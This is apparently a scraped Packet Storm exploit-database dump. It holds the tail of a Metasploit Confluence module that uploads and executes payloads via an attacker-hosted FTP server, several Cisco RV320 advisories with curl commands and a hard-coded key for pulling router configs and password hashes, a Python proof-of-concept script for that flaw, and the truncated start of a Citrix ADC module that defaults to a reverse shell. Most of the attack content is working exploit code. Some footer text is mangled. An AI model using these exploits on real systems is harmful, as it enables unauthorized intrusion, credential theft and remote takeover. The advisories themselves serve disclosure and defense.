\nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \nnew_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \n@fname.gsub!(/Program Files/, 'PROGRA~1') \nnew_fname.gsub!(/Program Files/, 'PROGRA~1') \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Linux platform. \n# \n# @return [void] \ndef exploit_as_linux \ntmp_path = get_tmp_path \n \nif tmp_path.blank? \nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) \nnew_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \n@command = \"chmod +x #{@fname}\" \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \ndef exploit \n@wrap_marker = Rex::Text.rand_text_alpha(5..10) \n \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \ntarget_platform = get_target_platform \nif target_platform.nil? \nfail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".') \nelse \nprint_status(\"Target being detected as: #{target_platform}\") \nend \n \nunless target_platform_compat?(target_platform) \nfail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') \nend \n \ncase target.name.downcase \nwhen /java$/ \nexploit_as_java \nwhen /windows$/ \nexploit_as_windows \nwhen /linux$/ \nexploit_as_linux \nend \nend \n \n# Wraps request. \n# \n# @return [String] \ndef wrap(string) \n\"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\" \nend \n \n# Returns unwrapped response. \n# \n# @return [String] \ndef clear_response(string) \nif match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m) \nreturn match.captures[0] \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152568/confluence_widget_connector.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-29T02:48:42", "description": "", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "PACKETSTORM:151312", "href": "https://packetstormsecurity.com/files/151312/Cisco-RV320-Unauthenticated-Diagnostic-Data-Retrieval.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval \n \nRedTeam Pentesting discovered that the Cisco RV320 router exposes \nsensitive diagnostic data without authentication through the device's \nweb interface. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15, 1.4.2.17 \nFixed Versions: since 1.4.2.19 \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface. In the device's firmware, this functionality is \nimplemented using a variety of CGI programs. Access to this web \ninterface requires prior authentication using a username and password. \nRedTeam Pentesting discovered the CGI program: \n \n/cgi-bin/export_debug_msg.exp \n \nThis program can be used to retrieve various diagnostic information from \nthe device, which includes its current configuration. In contrast to \nother functions, this CGI program does not require any form of \nauthentication. It may be accessed through the router's web server, \nwhich is available from the LAN by default. As described in [2], \nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web \nserver to the WAN on TCP port 8007. \n \n \nProof of Concept \n================ \n \nThe diagnostic data can be retrieved by issuing an HTTP POST request to \nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the \nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output \nshortened): \n \n------------------------------------------------------------------------ \n$ curl --data submitdebugmsg=1 \\ \n'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug \n \n$ openssl aes-128-cbc -salt -md md5 -d \\ \n-k 'NKDebug12#$%' < debug > debug.tgz \n \n$ mkdir output && tar -xf debug.tgz -C output/ \n \n$ ls -1 output/ \ndebug_messages.txt \netc.tgz \nnk_sysconfig \nvar.tgz \n \n$ cat output/nk_sysconfig \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nInstall firmware version 1.4.2.19 (or later) on the router. \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes sensitive \ndiagnostic information, such as the device's configuration, to \nuntrusted, potentially malicious parties. By retrieving this \ninformation, attackers can obtain internal network configuration, VPN or \nIPsec secrets, as well as password hashes for the router's user \naccounts. Knowledge of a user's password hash is sufficient to log into \nthe router's web interface. Any information obtained through \nexploitation of this vulnerability can be used to facilitate further \ncompromise of the device itself or attached networks. \n \n \nTimeline \n======== \n \n2018-09-19 Vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-23 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGeschA$?ftsfA1/4hrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151312/rt-sa-2018-003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-28T22:53:28", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152261", "href": "https://packetstormsecurity.com/files/152261/Cisco-RV320-Unauthenticated-Diagnostic-Data-Retrieval.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval \n \nRedTeam Pentesting discovered that the Cisco RV320 router still exposes \nsensitive diagnostic data without authentication via the device's web \ninterface due to an inadequate fix by the vendor. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 through 1.4.2.20 \nFixed Versions: none \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: working on patch \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-004 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface, which is implemented in various CGI programs in \nthe device's firmware. Access to this web interface requires prior \nauthentication using a username and password. Previously, RedTeam \nPentesting identified a vulnerability (rt-sa-2018-003) [2] in the CGI \nprogram: \n \n/cgi-bin/export_debug_msg.exp \n \nBy issuing an HTTP POST request to this program, it was possible to \nretrieve various diagnostic information from the device, including its \ncurrent configuration. This request did not require any prior \nauthentication. Cisco adressed this vulnerability in firmware version \n1.4.2.19 [3]. \n \nRedTeam Pentesting discovered that the CGI program in the patched \nfirmware is still vulnerable. The user agent \"curl\" is blacklisted by \nthe firmware and must be adjusted in the HTTP client. Again, \nexploitation does not require any authentication. \n \n \nProof of Concept \n================ \n \nThe diagnostic data can be retrieved by issuing an HTTP POST request to \nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the \nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output \nshortened): \n \n------------------------------------------------------------------------ \n$ curl -k -A kurl -X POST --data 'submitdebugmsg=1' \\ \n'https://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug \n \n$ openssl aes-128-cbc -salt -md md5 -d \\ \n-k 'NKDebug12#$%' < debug > debug.tgz \n \n$ mkdir output && tar -xf debug.tgz -C output/ \n \n$ ls -1 output/ \ndebug_messages.txt \netc.tgz \nnk_sysconfig \nvar.tgz \n \n$ cat output/nk_sysconfig \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nNone \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes sensitive \ndiagnostic information, such as the device's configuration, to \nuntrusted, potentially malicious parties. By retrieving this \ninformation, attackers can obtain internal network configuration, VPN or \nIPsec secrets, as well as password hashes for the router's user \naccounts. Knowledge of a user's password hash is sufficient to log into \nthe router's web interface, cracking of the hash is not required. Any \ninformation obtained through exploitation of this vulnerability can be \nused to facilitate further compromise of the device itself or attached \nnetworks. \n \n \nTimeline \n======== \n \n2018-09-19 Original vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-22 Firmware 1.4.2.20 released by vendor \n2019-01-23 Advisory (rt-sa-2018-003) published \n \n2019-02-07 Incomplete mitigation of vulnerability identified \n2019-02-08 Proof of concept sent to vendor \n2019-02-08 Receipt of proof of concept acknowledged by vendor \n2019-02-15 Full advisory sent to vendor \n2019-02-15 Notified vendor of disclosure date: 2019-03-27 \n2019-03-25 Requested progress update from vendor \n2019-03-25 Vendor requests postponed disclosure \n2019-03-25 Postponement declined \n2019-03-27 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-003 \n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152261/rt-sa-2019-004.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-28T22:53:29", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Configuration Export", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152260", "href": "https://packetstormsecurity.com/files/152260/Cisco-RV320-Unauthenticated-Configuration-Export.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Configuration Export \n \nRedTeam Pentesting discovered that the configuration of a Cisco RV320 \nrouter can still be exported without authentication via the device's web \ninterface due to an inadequate fix by the vendor. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 through 1.4.2.20 \nFixed Versions: none \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: working on patch \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface, which is implemented in various CGI programs in \nthe device's firmware. Access to this web interface requires prior \nauthentication using a username and password. Previously, RedTeam \nPentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI \nprogram: \n \n/cgi-bin/config.exp \n \nBy issuing an HTTP GET request to this program, it was possible to \nexport a router's configuration without providing any prior \nauthentication. This vulnerability was adressed in firmware version \n1.4.2.19 published by Cisco [3]. \n \nRedTeam Pentesting discovered that the CGI program in the patched \nfirmware is still vulnerable. By performing a specially crafted HTTP \nPOST request, attackers are still able to download the router's \nconfiguration. The user agent \"curl\" is blacklisted by the firmware and \nmust be adjusted in the HTTP client. Again, exploitation does not \nrequire any authentication. \n \n \nProof of Concept \n================ \n \nA device's configuration can be retrieved by issuing an HTTP POST request \nto the vulnerable CGI program (output shortened): \n \n------------------------------------------------------------------------ \n$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \\ \n'https://192.168.1.1/cgi-bin/config.exp' \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nNone \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes the device's \nconfiguration to untrusted, potentially malicious parties. By \ndownloading the configuration, attackers can obtain internal network \nconfiguration, VPN or IPsec secrets, as well as password hashes for the \nrouter's user accounts. Knowledge of a user's password hash is \nsufficient to log into the router's web interface, cracking of the hash \nis not required. Any information obtained through exploitation of this \nvulnerability can be used to facilitate further compromise of the device \nitself or attached networks. \n \n \nTimeline \n======== \n \n2018-09-19 Original vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-22 Firmware 1.4.2.20 released by vendor \n2019-01-23 Advisory (rt-sa-2018-002) published \n \n2019-02-07 Incomplete mitigation of vulnerability identified \n2019-02-08 Proof of concept sent to vendor \n2019-02-08 Receipt of proof of concept acknowledged by vendor \n2019-02-15 Full advisory sent to vendor \n2019-02-15 Notified vendor of disclosure date: 2019-03-27 \n2019-03-25 Requested progress update from vendor \n2019-03-25 Vendor requests postponed disclosure \n2019-03-25 Postponement declined \n2019-03-27 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002 \n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152260/rt-sa-2019-003.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-29T10:40:54", "description": "", "cvss3": {}, "published": "2019-01-29T00:00:00", "type": "packetstorm", "title": "Cisco RV300 / RV320 Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-29T00:00:00", "id": "PACKETSTORM:151374", "href": "https://packetstormsecurity.com/files/151374/Cisco-RV300-RV320-Information-Disclosure.html", "sourceData": "`# Exploit Title: 6coRV Exploit \n# Date: 01-26-2018 \n# Exploit Author: Harom Ramos [Horus] \n# Tested on: Cisco RV300/RV320 \n# CVE : CVE-2019-1653 \n \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nfrom fake_useragent import UserAgent \n \ndef random_headers(): \nreturn dict({'user-agent': UserAgent().random}) \n \ndef request(url): \nr = requests.Session() \ntry: \nget = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False \nif get.status_code == 200: \nreturn get.text \nexcept requests.ConnectionError: \nreturn 'Error Conecting' \nexcept requests.Timeout: \nreturn 'Error Timeout' \nexcept KeyboardInterrupt: \nraise \nexcept: \nreturn 0 \n \nprint(\"\") \nprint(\"##################################################\") \nprint(\"CISCO CVE-2019-1653 POC\") \nprint(\"From H. with love\") \nprint(\"\") \n \nurl = raw_input(\"URL> EX:http://url:port/ \") \nurl = url + \"/cgi-bin/config.exp\" \nprint(request(url)) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151374/ciscorv300320-disclose.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-01-29T02:48:41", "description": "", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Configuration Export", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "PACKETSTORM:151311", "href": "https://packetstormsecurity.com/files/151311/Cisco-RV320-Unauthenticated-Configuration-Export.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Configuration Export \n \nRedTeam Pentesting discovered that the configuration of a Cisco RV320 \nrouter may be exported without authentication through the device's web \ninterface. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15, 1.4.2.17 \nFixed Versions: since 1.4.2.19 \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface. In the device's firmware, this functionality is \nimplemented using a variety of CGI programs. Access to this web \ninterface requires prior authentication using a username and password. \nRedTeam Pentesting discovered the CGI program: \n \n/cgi-bin/config.exp \n \nThis program can be used to export the router's configuration. In \ncontrast to other functions, this CGI program does not require any form \nof authentication. It may be accessed through the router's web server, \nwhich is available from the LAN by default. As described in [2], \nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web \nserver to the WAN on TCP port 8007. \n \n \nProof of Concept \n================ \n \nA device's configuration can be retrieved by issuing an HTTP GET request \nto the vulnerable CGI program (output shortened): \n \n------------------------------------------------------------------------ \n$ curl -s http://192.168.1.1/cgi-bin/config.exp \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nInstall firmware version 1.4.2.19 (or later) on the router. \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes the device's \nconfiguration to untrusted, potentially malicious parties. By \ndownloading the configuration, attackers can obtain internal network \nconfiguration, VPN or IPsec secrets, as well as password hashes for the \nrouter's user accounts. Knowledge of a user's password hash is \nsufficient to log into the router's web interface. Any information \nobtained through exploitation of this vulnerability can be used to \nfacilitate further compromise of the device itself or attached networks. \n \n \nTimeline \n======== \n \n2018-09-19 Vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-23 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGeschA$?ftsfA1/4hrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151311/rt-sa-2018-002.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-13T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "PACKETSTORM:155930", "href": "https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC Remote Code Execution', \n'Description' => %q( \nAn issue was discovered in Citrix Application Delivery Controller (ADC) \nand Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n), \n'Author' => [ \n'RAMELLA S\u00e9bastien' # https://www.pirates.re/ \n], \n'References' => [ \n['CVE', '2019-19781'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], \n['EDB', '47901'], \n['EDB', '47902'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl meterpreter' \n} \n}, \n'Targets' => [ \n['Unix (remote shell)', \n'Type' => :cmd_shell, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (command-line)', \n'Type' => :cmd_generic, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptAddress.new('RHOST', [true, 'The target address']) \n]) \n \nregister_advanced_options([ 